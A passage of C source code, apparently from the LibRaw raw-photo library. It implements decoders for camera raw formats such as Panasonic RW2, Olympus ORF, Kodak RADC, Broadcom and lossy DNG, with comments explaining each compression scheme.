} catch (...){
free (back[4]);
ljpeg_end (&jh);
throw;
}
#endif
free (back[4]);
ljpeg_end (&jh);
if (image) mix_green = 1;
}
void CLASS leaf_hdr_load_raw()
{
ushort *pixel=0;
unsigned tile=0, r, c, row, col;
if (!filters) {
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "leaf_hdr_load_raw()");
}
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
FORC(tiff_samples)
for (r=0; r < raw_height; r++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (r % tile_length == 0) {
fseek (ifp, data_offset + 4*tile++, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
}
if (filters && c != shot_select) continue;
if (filters) pixel = raw_image + r*raw_width;
read_shorts (pixel, raw_width);
if (!filters && (row = r - top_margin) < height)
for (col=0; col < width; col++)
image[row*width+col][c] = pixel[col+left_margin];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
if(!filters) free(pixel);
throw;
}
#endif
if (!filters) {
maximum = 0xffff;
raw_color = 1;
free (pixel);
}
}
void CLASS unpacked_load_raw()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
read_shorts (raw_image, raw_width*raw_height);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS unpacked_load_raw_reversed()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
for (row=raw_height-1; row >= 0; row--)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
read_shorts (&raw_image[row*raw_width], raw_width);
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS sinar_4shot_load_raw()
{
ushort *pixel;
unsigned shot, row, col, r, c;
if (raw_image) {
shot = LIM (shot_select, 1, 4) - 1;
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
unpacked_load_raw();
return;
}
#ifdef LIBRAW_LIBRARY_BUILD
else if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "sinar_4shot_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (shot=0; shot < 4; shot++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
for (row=0; row < raw_height; row++) {
read_shorts (pixel, raw_width);
if ((r = row-top_margin - (shot >> 1 & 1)) >= height) continue;
for (col=0; col < raw_width; col++) {
if ((c = col-left_margin - (shot & 1)) >= width) continue;
image[r*width+c][(row & 1)*3 ^ (~col & 1)] = pixel[col];
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free(pixel);
throw;
}
#endif
free (pixel);
mix_green = 1;
}
void CLASS imacon_full_load_raw()
{
int row, col;
if (!image) return;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned short *buf = (unsigned short *)malloc(width*3*sizeof(unsigned short));
merror(buf,"imacon_full_load_raw");
#endif
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
read_shorts(buf,width*3);
unsigned short (*rowp)[4] = &image[row*width];
for (col=0; col < width; col++)
{
rowp[col][0]=buf[col*3];
rowp[col][1]=buf[col*3+1];
rowp[col][2]=buf[col*3+2];
rowp[col][3]=0;
}
#else
for (col=0; col < width; col++)
read_shorts (image[row*width+col], 3);
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(buf);
#endif
}
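/* Generic packed-bit loader: tiff_bps bits per sample are pulled from a
   64-bit buffer refilled "bite" bytes at a time; load_flags bits control
   row interleaving, per-row padding, column swapping and the seek
   behaviour for split files. */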
void CLASS packed_load_raw()
{
int vbits=0, bwide, rbits, bite, half, irow, row, col, val, i;
UINT64 bitbuf=0;
bwide = raw_width * tiff_bps / 8;
bwide += bwide & load_flags >> 7;
rbits = bwide * 8 - raw_width * tiff_bps;
if (load_flags & 1) bwide = bwide * 16 / 15;
bite = 8 + (load_flags & 24);
half = (raw_height+1) >> 1;
for (irow=0; irow < raw_height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
row = irow;
if (load_flags & 2 &&
(row = irow % half * 2 + irow / half) == 1 &&
load_flags & 4) {
if (vbits=0, tiff_compress)
fseek (ifp, data_offset - (-half*bwide & -2048), SEEK_SET);
else {
fseek (ifp, 0, SEEK_END);
fseek (ifp, ftell(ifp) >> 3 << 2, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
if(feof(ifp)) throw LIBRAW_EXCEPTION_IO_EOF;
#endif
for (col=0; col < raw_width; col++) {
for (vbits -= tiff_bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
val = bitbuf << (64-tiff_bps-vbits) >> (64-tiff_bps);
RAW(row,col ^ (load_flags >> 6 & 1)) = val;
if (load_flags & 1 && (col % 10) == 9 && fgetc(ifp) &&
row < height+top_margin && col < width+left_margin) derror();
}
vbits -= rbits;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
ushort raw_stride;
void CLASS parse_broadcom () {
/* This structure is at offset 0xb0 from the 'BRCM' ident. */
struct {
uint8_t umode[32];
uint16_t uwidth;
uint16_t uheight;
uint16_t padding_right;
uint16_t padding_down;
uint32_t unknown_block[6];
uint16_t transform;
uint16_t format;
uint8_t bayer_order;
uint8_t bayer_format;
} header;
header.bayer_order = 0;
fseek (ifp, 0xb0 - 0x20, SEEK_CUR);
fread (&header, 1, sizeof(header), ifp);
raw_stride = ((((((header.uwidth + header.padding_right)*5)+3)>>2) + 0x1f)&(~0x1f));
raw_width = width = header.uwidth;
raw_height = height = header.uheight;
filters = 0x16161616; /* default Bayer order is 2, BGGR */
switch (header.bayer_order) {
case 0: /* RGGB */
filters = 0x94949494;
break;
case 1: /* GBRG */
filters = 0x49494949;
break;
case 3: /* GRBG */
filters = 0x61616161;
break;
}
}
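/* Broadcom (Raspberry Pi camera) packed data: raw_stride bytes per row,
   with a byte-order fix-up within each 4-byte group for little-endian
   files, and 5 bytes holding four 10-bit pixels (four high bytes plus one
   byte of 2-bit tails). */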
void CLASS broadcom_load_raw() {
uchar *data, *dp;
int rev, row, col, c;
rev = 3 * (order == 0x4949);
data = (uchar *) malloc (raw_stride*2);
merror (data, "broadcom_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data+raw_stride, 1, raw_stride, ifp) < raw_stride) derror();
FORC(raw_stride) data[c] = data[raw_stride+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
#endif
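/* Nokia packed 10-bit data (same 5-bytes-per-4-pixels layout as above);
   for OmniVision sensors the CFA layout is then chosen by comparing
   squared diagonal differences on the two centre rows. */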
void CLASS nokia_load_raw()
{
uchar *data, *dp;
int rev, dwide, row, col, c;
double sum[]={0,0};
rev = 3 * (order == 0x4949);
dwide = (raw_width * 5 + 1) / 4;
data = (uchar *) malloc (dwide*2);
merror (data, "nokia_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data+dwide, 1, dwide, ifp) < dwide) derror();
FORC(dwide) data[c] = data[dwide+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...){
free (data);
throw;
}
#endif
free (data);
maximum = 0x3ff;
if (strncmp(make,"OmniVision",10)) return;
row = raw_height/2;
FORC(width-1) {
sum[ c & 1] += SQR(RAW(row,c)-RAW(row+1,c+1));
sum[~c & 1] += SQR(RAW(row+1,c)-RAW(row,c+1));
}
if (sum[1] > sum[0]) filters = 0x4b4b4b4b;
}
void CLASS android_tight_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
bwide = -(-5*raw_width >> 5) << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_tight_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
void CLASS android_loose_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
UINT64 bitbuf=0;
bwide = (raw_width+5)/6 << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_loose_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=8, col+=6) {
FORC(8) bitbuf = (bitbuf << 8) | dp[c^7];
FORC(6) RAW(row,col+c) = (bitbuf >> c*10) & 0x3ff;
}
}
free (data);
}
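/* Canon RMF: each 32-bit word holds three 10-bit samples (at bit offsets
   2, 12 and 22); output coordinates are shifted four columns to the left,
   wrapping two rows up at the edge, and values pass through curve[]. */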
void CLASS canon_rmf_load_raw()
{
int row, col, bits, orow, ocol, c;
#ifdef LIBRAW_LIBRARY_BUILD
int *words = (int*)malloc(sizeof(int)*(raw_width/3+1));
merror(words,"canon_rmf_load_raw");
#endif
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
fread(words,sizeof(int),raw_width/3,ifp);
for (col=0; col < raw_width-2; col+=3)
{
bits = words[col/3];
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0)
{
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#else
for (col=0; col < raw_width-2; col+=3) {
bits = get4();
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0) {
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(words);
#endif
maximum = curve[0x3ff];
}
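/* Panasonic bit reader: data is buffered in 0x4000-byte blocks rotated by
   load_flags bytes, and bits are consumed walking backwards through the
   block (vbits counts down, wrapping at 0x1ffff). */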
unsigned CLASS pana_bits (int nbits)
{
#ifndef LIBRAW_NOTHREADS
#define buf tls->pana_bits.buf
#define vbits tls->pana_bits.vbits
#else
static uchar buf[0x4000];
static int vbits;
#endif
int byte;
if (!nbits) return vbits=0;
if (!vbits) {
fread (buf+load_flags, 1, 0x4000-load_flags, ifp);
fread (buf, 1, load_flags, ifp);
}
vbits = (vbits - nbits) & 0x1ffff;
byte = vbits >> 3 ^ 0x3ff0;
return (buf[byte] | buf[byte+1] << 8) >> (vbits & 7) & ~((~0u) << nbits);
#ifndef LIBRAW_NOTHREADS
#undef buf
#undef vbits
#endif
}
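/* Panasonic RW2 decompression: pixels are processed 14 per group, a 2-bit
   code on every third pixel updates the shift "sh", and two interleaved
   predictors accumulate 8-bit deltas (or restart from a 12-bit literal
   when the predictor is empty). */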
void CLASS panasonic_load_raw()
{
int row, col, i, j, sh=0, pred[2], nonz[2];
pana_bits(0);
for (row = 0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if ((i = col % 14) == 0)
pred[0] = pred[1] = nonz[0] = nonz[1] = 0;
if (i % 3 == 2) sh = 4 >> (3 - pana_bits(2));
if (nonz[i & 1]) {
if ((j = pana_bits(8))) {
if ((pred[i & 1] -= 0x80 << sh) < 0 || sh == 4)
pred[i & 1] &= ~((~0u) << sh);
pred[i & 1] += j << sh;
}
}
else if ((nonz[i & 1] = pana_bits(8)) || i > 11)
pred[i & 1] = nonz[i & 1] << 4 | pana_bits(4);
if ((RAW(row, col) = pred[col & 1]) > 4098 && col < width && row < height)
derror();
}
}
}
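/* Olympus ORF compression: a fixed Huffman table gives the number of high
   bits of each difference, sign and low bits are read directly, and the
   prediction is a median-like blend of the west, north and north-west
   neighbours in the same colour plane. */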
void CLASS olympus_load_raw()
{
ushort huff[4096];
int row, col, nbits, sign, low, high, i, c, w, n, nw;
int acarry[2][3], *carry, pred, diff;
huff[n=0] = 0xc0c;
for (i=12; i--; )
FORC(2048 >> i) huff[++n] = (i+1) << 8 | i;
fseek (ifp, 7, SEEK_CUR);
getbits(-1);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (acarry, 0, sizeof acarry);
for (col=0; col < raw_width; col++) {
carry = acarry[col & 1];
i = 2 * (carry[2] < 3);
for (nbits=2+i; (ushort) carry[0] >> (nbits+i); nbits++);
low = (sign = getbits(3)) & 3;
sign = sign << 29 >> 31;
if ((high = getbithuff(12,huff)) == 12)
high = getbits(16-nbits) >> 1;
carry[0] = (high << nbits) | getbits(nbits);
diff = (carry[0] ^ sign) + carry[1];
carry[1] = (diff*3 + carry[1]) >> 5;
carry[2] = carry[0] > 16 ? 0 : carry[2]+1;
if (col >= width) continue;
if (row < 2 && col < 2) pred = 0;
else if (row < 2) pred = RAW(row,col-2);
else if (col < 2) pred = RAW(row-2,col);
else {
w = RAW(row,col-2);
n = RAW(row-2,col);
nw = RAW(row-2,col-2);
if ((w < nw && nw < n) || (n < nw && nw < w)) {
if (ABS(w-nw) > 32 || ABS(n-nw) > 32)
pred = w + n - nw;
else pred = (w + n) >> 1;
} else pred = ABS(w-nw) > ABS(n-nw) ? w : n;
}
if ((RAW(row,col) = pred + ((diff << 2) | low)) >> 12) derror();
}
}
}
void CLASS minolta_rd175_load_raw()
{
uchar pixel[768];
unsigned irow, box, row, col;
for (irow=0; irow < 1481; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 768, ifp) < 768) derror();
box = irow / 82;
row = irow % 82 * 12 + ((box < 12) ? box | 1 : (box-12)*2);
switch (irow) {
case 1477: case 1479: continue;
case 1476: row = 984; break;
case 1480: row = 985; break;
case 1478: row = 985; box = 1;
}
if ((box < 12) && (box & 1)) {
for (col=0; col < 1533; col++, row ^= 1)
if (col != 1) RAW(row,col) = (col+1) & 2 ?
pixel[col/2-1] + pixel[col/2+1] : pixel[col/2] << 1;
RAW(row,1) = pixel[1] << 1;
RAW(row,1533) = pixel[765] << 1;
} else
for (col=row & 1; col < 1534; col+=2)
RAW(row,col) = pixel[col/2] << 1;
}
maximum = 0xff << 1;
}
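/* Apple QuickTake 100: 4-bit codes index gstep[] in the first pass and
   2-bit codes index rstep[] (selected by local sharpness) for the
   remaining sites; pixels are predicted from already decoded neighbours
   in a 484x644 work buffer and finally expanded to 10 bits via t_curve[]. */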
void CLASS quicktake_100_load_raw()
{
uchar pixel[484][644];
static const short gstep[16] =
{ -89,-60,-44,-32,-22,-15,-8,-2,2,8,15,22,32,44,60,89 };
static const short rstep[6][4] =
{ { -3,-1,1,3 }, { -5,-1,1,5 }, { -8,-2,2,8 },
{ -13,-3,3,13 }, { -19,-4,4,19 }, { -28,-6,6,28 } };
static const short t_curve[256] =
{ 0,1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,
28,29,30,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,53,
54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,74,75,76,77,78,
79,80,81,82,83,84,86,88,90,92,94,97,99,101,103,105,107,110,112,114,116,
118,120,123,125,127,129,131,134,136,138,140,142,144,147,149,151,153,155,
158,160,162,164,166,168,171,173,175,177,179,181,184,186,188,190,192,195,
197,199,201,203,205,208,210,212,214,216,218,221,223,226,230,235,239,244,
248,252,257,261,265,270,274,278,283,287,291,296,300,305,309,313,318,322,
326,331,335,339,344,348,352,357,361,365,370,374,379,383,387,392,396,400,
405,409,413,418,422,426,431,435,440,444,448,453,457,461,466,470,474,479,
483,487,492,496,500,508,519,531,542,553,564,575,587,598,609,620,631,643,
654,665,676,687,698,710,721,732,743,754,766,777,788,799,810,822,833,844,
855,866,878,889,900,911,922,933,945,956,967,978,989,1001,1012,1023 };
int rb, row, col, sharp, val=0;
#ifdef LIBRAW_LIBRARY_BUILD
if(width>640 || height > 480)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
getbits(-1);
memset (pixel, 0x80, sizeof pixel);
for (row=2; row < height+2; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=2+(row & 1); col < width+2; col+=2) {
val = ((pixel[row-1][col-1] + 2*pixel[row-1][col+1] +
pixel[row][col-2]) >> 2) + gstep[getbits(4)];
pixel[row][col] = val = LIM(val,0,255);
if (col < 4)
pixel[row][col-2] = pixel[row+1][~row & 1] = val;
if (row == 2)
pixel[row-1][col+1] = pixel[row-1][col+3] = val;
}
pixel[row][col] = val;
}
for (rb=0; rb < 2; rb++)
for (row=2+rb; row < height+2; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
if (row < 4 || col < 4) sharp = 2;
else {
val = ABS(pixel[row-2][col] - pixel[row][col-2])
+ ABS(pixel[row-2][col] - pixel[row-2][col-2])
+ ABS(pixel[row][col-2] - pixel[row-2][col-2]);
sharp = val < 4 ? 0 : val < 8 ? 1 : val < 16 ? 2 :
val < 32 ? 3 : val < 48 ? 4 : 5;
}
val = ((pixel[row-2][col] + pixel[row][col-2]) >> 1)
+ rstep[sharp][getbits(2)];
pixel[row][col] = val = LIM(val,0,255);
if (row < 4) pixel[row-2][col+2] = val;
if (col < 4) pixel[row+2][col-2] = val;
}
}
for (row=2; row < height+2; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
val = ((pixel[row][col-1] + (pixel[row][col] << 2) +
pixel[row][col+1]) >> 1) - 0x100;
pixel[row][col] = LIM(val,0,255);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = t_curve[pixel[row+2][col+2]];
}
maximum = 0x3ff;
}
#define radc_token(tree) ((signed char) getbithuff(8,huff[tree]))
#define FORYX for (y=1; y < 3; y++) for (x=col+1; x >= col; x--)
#define PREDICTOR (c ? (buf[c][y-1][x] + buf[c][y][x+1]) / 2 \
: (buf[c][y-1][x+1] + 2*buf[c][y-1][x] + buf[c][y][x+1]) / 4)
#ifdef __GNUC__
# if __GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 8)
# pragma GCC optimize("no-aggressive-loop-optimizations")
# endif
#endif
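/* Kodak RADC compression: src[] packs the Huffman code tables; every 4
   output rows start with three 6-bit channel multipliers, tokens either
   code a literal/step or a run of predicted pixels (PREDICTOR), and the
   result is mapped through the piecewise-linear curve built from pt[]. */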
void CLASS kodak_radc_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
// All Kodak RADC images are 768x512
if(width>768 || raw_width>768 || height > 512 || raw_height>512 )
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
static const signed char src[] = {
1,1, 2,3, 3,4, 4,2, 5,7, 6,5, 7,6, 7,8,
1,0, 2,1, 3,3, 4,4, 5,2, 6,7, 7,6, 8,5, 8,8,
2,1, 2,3, 3,0, 3,2, 3,4, 4,6, 5,5, 6,7, 6,8,
2,0, 2,1, 2,3, 3,2, 4,4, 5,6, 6,7, 7,5, 7,8,
2,1, 2,4, 3,0, 3,2, 3,3, 4,7, 5,5, 6,6, 6,8,
2,3, 3,1, 3,2, 3,4, 3,5, 3,6, 4,7, 5,0, 5,8,
2,3, 2,6, 3,0, 3,1, 4,4, 4,5, 4,7, 5,2, 5,8,
2,4, 2,7, 3,3, 3,6, 4,1, 4,2, 4,5, 5,0, 5,8,
2,6, 3,1, 3,3, 3,5, 3,7, 3,8, 4,0, 5,2, 5,4,
2,0, 2,1, 3,2, 3,3, 4,4, 4,5, 5,6, 5,7, 4,8,
1,0, 2,2, 2,-2,
1,-3, 1,3,
2,-17, 2,-5, 2,5, 2,17,
2,-7, 2,2, 2,9, 2,18,
2,-18, 2,-9, 2,-2, 2,7,
2,-28, 2,28, 3,-49, 3,-9, 3,9, 4,49, 5,-79, 5,79,
2,-1, 2,13, 2,26, 3,39, 4,-16, 5,55, 6,-37, 6,76,
2,-26, 2,-13, 2,1, 3,-39, 4,16, 5,-55, 6,-76, 6,37
};
ushort huff[19][256];
int row, col, tree, nreps, rep, step, i, c, s, r, x, y, val;
short last[3] = { 16,16,16 }, mul[3], buf[3][3][386];
static const ushort pt[] =
{ 0,0, 1280,1344, 2320,3616, 3328,8000, 4095,16383, 65535,16383 };
for (i=2; i < 12; i+=2)
for (c=pt[i-2]; c <= pt[i]; c++)
curve[c] = (float)
(c-pt[i-2]) / (pt[i]-pt[i-2]) * (pt[i+1]-pt[i-1]) + pt[i-1] + 0.5;
for (s=i=0; i < sizeof src; i+=2)
FORC(256 >> src[i])
((ushort *)huff)[s++] = src[i] << 8 | (uchar) src[i+1];
s = kodak_cbpp == 243 ? 2 : 3;
FORC(256) huff[18][c] = (8-s) << 8 | c >> s << s | 1 << (s-1);
getbits(-1);
for (i=0; i < sizeof(buf)/sizeof(short); i++)
((short *)buf)[i] = 2048;
for (row=0; row < height; row+=4) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC3 mul[c] = getbits(6);
#ifdef LIBRAW_LIBRARY_BUILD
if(!mul[0] || !mul[1] || !mul[2])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
FORC3 {
val = ((0x1000000/last[c] + 0x7ff) >> 12) * mul[c];
s = val > 65564 ? 10:12;
x = ~((~0u) << (s-1));
val <<= 12-s;
for (i=0; i < sizeof(buf[0])/sizeof(short); i++)
((short *)buf[c])[i] = (((short *)buf[c])[i] * val + x) >> s;
last[c] = mul[c];
for (r=0; r <= !c; r++) {
buf[c][1][width/2] = buf[c][2][width/2] = mul[c] << 7;
for (tree=1, col=width/2; col > 0; ) {
if ((tree = radc_token(tree))) {
col -= 2;
if (tree == 8)
FORYX buf[c][y][x] = (uchar) radc_token(18) * mul[c];
else
FORYX buf[c][y][x] = radc_token(tree+10) * 16 + PREDICTOR;
} else
do {
nreps = (col > 2) ? radc_token(9) + 1 : 1;
for (rep=0; rep < 8 && rep < nreps && col > 0; rep++) {
col -= 2;
if(col>=0)
FORYX buf[c][y][x] = PREDICTOR;
if (rep & 1) {
step = radc_token(10) << 4;
FORYX buf[c][y][x] += step;
}
}
} while (nreps == 9);
}
for (y=0; y < 2; y++)
for (x=0; x < width/2; x++) {
val = (buf[c][y+1][x] << 4) / mul[c];
if (val < 0) val = 0;
if (c) RAW(row+y*2+c-1,x*2+2-c) = val;
else RAW(row+r*2+y,x*2+y) = val;
}
memcpy (buf[c][0]+!c, buf[c][2], sizeof buf[c][0]-2*!c);
}
}
for (y=row; y < row+4; y++)
for (x=0; x < width; x++)
if ((x+y) & 1) {
r = x ? x-1 : x+1;
s = x+1 < width ? x+1 : x-1;
val = (RAW(y,x)-2048)*2 + (RAW(y,r)+RAW(y,s))/2;
if (val < 0) val = 0;
RAW(y,x) = val;
}
}
for (i=0; i < height*width; i++)
raw_image[i] = curve[raw_image[i]];
maximum = 0x3fff;
}
#undef FORYX
#undef PREDICTOR
#ifdef NO_JPEG
void CLASS kodak_jpeg_load_raw() {}
void CLASS lossy_dng_load_raw() {}
#else
#ifndef LIBRAW_LIBRARY_BUILD
METHODDEF(boolean)
fill_input_buffer (j_decompress_ptr cinfo)
{
static uchar jpeg_buffer[4096];
size_t nbytes;
nbytes = fread (jpeg_buffer, 1, 4096, ifp);
swab (jpeg_buffer, jpeg_buffer, nbytes);
cinfo->src->next_input_byte = jpeg_buffer;
cinfo->src->bytes_in_buffer = nbytes;
return TRUE;
}
void CLASS kodak_jpeg_load_raw()
{
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
int row, col;
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
jpeg_stdio_src (&cinfo, ifp);
cinfo.src->fill_input_buffer = fill_input_buffer;
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 )) {
fprintf (stderr,_("%s: incorrect JPEG dimensions\n"), ifname);
jpeg_destroy_decompress (&cinfo);
longjmp (failure, 3);
}
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, width*3, 1);
while (cinfo.output_scanline < cinfo.output_height) {
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
maximum = 0xff << 1;
}
#else
struct jpegErrorManager {
struct jpeg_error_mgr pub;
};
static void jpegErrorExit (j_common_ptr cinfo)
{
jpegErrorManager* myerr = (jpegErrorManager*) cinfo->err;
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
// LibRaw's own implementation of kodak_jpeg_load_raw
void CLASS kodak_jpeg_load_raw()
{
if(data_size < 1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
int row, col;
jpegErrorManager jerr;
struct jpeg_decompress_struct cinfo;
cinfo.err = jpeg_std_error(&jerr.pub);
jerr.pub.error_exit = jpegErrorExit;
unsigned char *jpg_buf = (unsigned char *)malloc(data_size);
merror(jpg_buf,"kodak_jpeg_load_raw");
unsigned char *pixel_buf = (unsigned char*) malloc(width*3);
jpeg_create_decompress (&cinfo);
merror(pixel_buf,"kodak_jpeg_load_raw");
fread(jpg_buf,data_size,1,ifp);
swab ((char*)jpg_buf, (char*)jpg_buf, data_size);
try
{
jpeg_mem_src(&cinfo, jpg_buf, data_size);
int rc = jpeg_read_header(&cinfo, TRUE);
if(rc!=1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 ))
{
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
unsigned char *buf[1];
buf[0] = pixel_buf;
while (cinfo.output_scanline < cinfo.output_height)
{
checkCancel();
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
unsigned char (*pixel)[3] = (unsigned char (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
}
catch (...)
{
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
throw;
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
maximum = 0xff << 1;
}
#endif
#ifndef LIBRAW_LIBRARY_BUILD
void CLASS gamma_curve (double pwr, double ts, int mode, int imax);
#endif
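/* Lossy (JPEG-compressed) DNG: each tile is a plain 8-bit JPEG; if the
   OpcodeList contains MapPolynomial entries (opcode 8) they define the
   per-channel tone curves, otherwise an sRGB gamma curve is used, and
   every decoded sample is expanded through cur[] into image[]. */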
void CLASS lossy_dng_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
unsigned sorder=order, ntags, opcode, deg, i, j, c;
unsigned save=data_offset-4, trow=0, tcol=0, row, col;
ushort cur[3][256];
double coeff[9], tot;
if (meta_offset) {
fseek (ifp, meta_offset, SEEK_SET);
order = 0x4d4d;
ntags = get4();
while (ntags--) {
opcode = get4(); get4(); get4();
if (opcode != 8)
{ fseek (ifp, get4(), SEEK_CUR); continue; }
fseek (ifp, 20, SEEK_CUR);
if ((c = get4()) > 2) break;
fseek (ifp, 12, SEEK_CUR);
if ((deg = get4()) > 8) break;
for (i=0; i <= deg && i < 9; i++)
coeff[i] = getreal(12);
for (i=0; i < 256; i++) {
for (tot=j=0; j <= deg; j++)
tot += coeff[j] * pow(i/255.0, (int)j);
cur[c][i] = tot*0xffff;
}
}
order = sorder;
} else {
gamma_curve (1/2.4, 12.92, 1, 255);
FORC3 memcpy (cur[c], curve, sizeof cur[0]);
}
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
